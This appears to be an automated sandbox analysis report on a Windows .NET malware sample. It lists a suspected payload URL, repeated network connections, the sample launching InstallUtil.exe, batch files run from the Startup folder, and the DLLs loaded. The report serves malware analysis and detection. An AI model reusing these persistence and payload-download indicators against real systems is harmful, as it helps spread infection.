                      Source: InstallUtil.exe, 00000003.00000002.2630032630.000000000314E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003096000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.00000000030EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.000000000300C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.0000000003010000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003049000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003033000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.000000000306B000.00000004.00000800.00020000.00000000.sdmp, VUrXgpTqluCxhgE6UCHkYL66.exe.3.dr, FUtH9YITjAWMFeQjQQ7DRSix.exe.3.dr, O9eYcIOmtMzXKWtuQMaDYhYu.exe.3.dr, whUHN2pww65ZtjYEzLyUMEnE.exe.3.drString found in binary or memory: https://yip.su/RNWPd
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su/RNWPd.exe
                      Source: InstallUtil.exe, 00000003.00000002.2630032630.0000000003023000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003010000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003049000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.0000000003033000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.000000000306B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2630032630.000000000305B000.00000004.00000800.00020000.00000000.sdmp, VUrXgpTqluCxhgE6UCHkYL66.exe.3.dr, FUtH9YITjAWMFeQjQQ7DRSix.exe.3.dr, O9eYcIOmtMzXKWtuQMaDYhYu.exe.3.dr, whUHN2pww65ZtjYEzLyUMEnE.exe.3.drString found in binary or memory: https://yip.su/redirect-
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.11:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.11:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.11:49715 version: TLS 1.2
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B4A478 CreateProcessAsUserW,0_2_07B4A478
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C29B00_2_012C29B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C6C2D0_2_012C6C2D
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C31180_2_012C3118
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C366B0_2_012C366B
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0575D16C0_2_0575D16C
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05811C000_2_05811C00
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05811BD00_2_05811BD0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_058100130_2_05810013
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_058100400_2_05810040
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05ED4E580_2_05ED4E58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05EDFA000_2_05EDFA00
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05EDFA100_2_05EDFA10
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076D3FB00_2_076D3FB0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076DFD680_2_076DFD68
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076DFD780_2_076DFD78
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076DFB400_2_076DFB40
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076DFB300_2_076DFB30
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076DF78A0_2_076DF78A
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076DF7980_2_076DF798
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076DF27D0_2_076DF27D
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076DF2AA0_2_076DF2AA
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076DF2A40_2_076DF2A4
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076DF4980_2_076DF498
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778D7D80_2_0778D7D8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07783BBE0_2_07783BBE
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778E6780_2_0778E678
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778CE100_2_0778CE10
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778B9780_2_0778B978
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_077885580_2_07788558
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778C5880_2_0778C588
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778A8E00_2_0778A8E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07782B200_2_07782B20
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778D7C80_2_0778D7C8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778CE000_2_0778CE00
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778B9680_2_0778B968
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778F5600_2_0778F560
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778C5490_2_0778C549
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778D5800_2_0778D580
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778A8D00_2_0778A8D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_079600400_2_07960040
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B433700_2_07B43370
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B493780_2_07B49378
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B455A00_2_07B455A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B44D880_2_07B44D88
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B4A9F80_2_07B4A9F8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B4AD000_2_07B4AD00
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B400400_2_07B40040
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B40B9D0_2_07B40B9D
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B4B7980_2_07B4B798
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B443880_2_07B44388
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B40BF00_2_07B40BF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B47BE80_2_07B47BE8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B443790_2_07B44379
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B4EF680_2_07B4EF68
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B473520_2_07B47352
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B4335F0_2_07B4335F
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B473580_2_07B47358
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B455900_2_07B45590
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B485D00_2_07B485D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B48D380_2_07B48D38
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B44D790_2_07B44D79
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B400060_2_07B40006
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B43C680_2_07B43C68
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076D3F850_2_076D3F85
                      Source: file.exe, 00000000.00000002.1777057896.0000000007760000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll6 vs file.exe
                      Source: file.exe, 00000000.00000002.1761380905.0000000003078000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNew.exe" vs file.exe
                      Source: file.exe, 00000000.00000002.1773580345.0000000003FE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs file.exe
                      Source: file.exe, 00000000.00000000.1373249643.00000000001CA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesetup11.exeH vs file.exe
                      Source: file.exe, 00000000.00000002.1761380905.000000000345F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNew.exe" vs file.exe
                      Source: file.exe, 00000000.00000002.1774284685.0000000005660000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs file.exe
                      Source: file.exe, 00000000.00000002.1760719227.0000000001312000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                      Source: file.exeBinary or memory string: OriginalFilenamesetup11.exeH vs file.exe
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: file.exe, m8RB.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                      Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@29/8@3/3
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3832:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2752:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4916:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1580:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5160:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:340:120:WilError_03
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Volrhw1xPk7ixUGFUQh9lCFk.bat" "
                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: file.exeReversingLabs: Detection: 42%
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Volrhw1xPk7ixUGFUQh9lCFk.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lkpj4eLKYuRL6LrNltOgK200.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VKr8Efnr4PhdaHsuTmp4wB4v.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JG3bSh7wTLa4W4VZ8WnUKE9x.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JWq659NA2OqtOCxKRUrX3Wvt.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UMHO1eaoah7nvsSNcEMZSaPH.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ybsrj9OwOR4A6LpqK3nX4c7P.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\B7apkUpVBoYMsvQw8GBJaP4b.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: acgenral.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: msacm32.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winmmbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winmmbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: acgenral.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msacm32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winmmbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winmmbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
